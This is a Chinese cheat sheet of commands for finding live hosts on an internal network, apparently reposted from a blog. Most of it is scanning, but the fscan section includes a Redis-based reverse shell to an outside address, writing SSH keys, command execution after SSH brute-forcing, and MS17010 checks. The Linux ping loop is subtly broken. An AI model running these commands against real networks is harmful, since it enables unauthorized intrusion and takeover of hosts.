内网存活主机探测的一些方法

1.Linux使用ping探测存活主机:

  for k in $( seq 1 255);do ping -c 1 192.168.7.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

2.Windows使用ping探测存活主机:

  for /l %i in (1,1,255) do @ping 192.168.7.%i -w 1 -n 1|find /i "ttl="

3.使用nmap探测存活主机:

  ARP 扫描:nmap -PR -sn 192.168.7.0/24ICMP 扫描:nmap ‐sP ‐PI 192.168.7.0/24 ‐T4ICMP 扫描:nmap ‐sn ‐PE ‐T4 192.168.7.0/24SNMP 扫描:nmap -sU --script snmp-brute 192.168.7.0/24 -T4UDP 扫描:nmap -sU -T5 -sV --max-retries 1 192.168.7.7 -p 500NetBIOS 扫描:nmap --script nbstat.nse -sU -p137 192.168.7.0/24 -T4SMB 扫描:nmap ‐sU ‐sS ‐‐script smb‐enum‐shares.nse ‐p 445 192.168.7.0/24

4.Windows使用arp-scan探测存活主机:

  arp-scan.exe -t 10.30.3.1/24

5.使用Metasploit探测存活主机:

  auxiliary/scanner/discovery/udp_probe

  auxiliary/scanner/discovery/udp_sweep

  auxiliary/scanner/discovery/arp_sweep

  auxiliary/scanner/netbios/nbname

  auxiliary/scanner/snmp/snmp_enum

  auxiliary/scanner/smb/smb_version

6.使用fscan探测存活主机:

  fscan -h 192.168.1.1/24

  fscan.exe -h 192.168.1.1/24 (默认使用全部模块)

  fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)

  fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)

  fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)

  fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)

  fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)

7.使用Ladon探测存活主机:

  Ladon默认扫描通过ICMP探测存活IP,再加载模块,大部份内网代理工具并不支持ICMP协议。或目标大量机器存在防火墙或禁Ping,这种情况下需要Ladon功能扫描内网则需加nocheck
  命令: Ladon nocheck

  命令: Ladon nocheck 扫描参数
  例子: Ladon nocheck MS17010
  
  命令: Ladon nocheck IP/URL/IP段
  扫描参数
例子: Ladon nocheck 192.168.1.8/24 MS17010

8.使用tcping探测存活主机:

tcping.exe -n 1 192.168.7.7 445
Probing 192.168.7.7:445/tcp - Port is open - time=1.719ms

Ping statistics for 192.168.7.7:445

  1 probes sent.


  1 successful, 0 failed. (0.00% fail)

Approximate trip times in milli-seconds:

  Minimum = 1.719ms, Maximum = 1.719ms, Average = 1.719ms

9.使用masscan探测存活主机:

  masscan --ping 192.168.123.1/24 --rate 1000000masscan -p80,8080-8100 10.0.0.0/8

10.nbtscan 存活探测:

  nbtscan.exe -m 192.168.1.1/24nbtscan -r 192.168.1.1/24

11.PowerShell 存活探测:

  powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;InvokeARPScan -CIDR 192.168.1.0/24"
  
powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐ResolveHost ‐ScanPort ‐Port 445,135"
勿做伸手党,勤思考,总能成就一番事业。
原文地址:https://www.cnblogs.com/X-caiji/p/14620182.html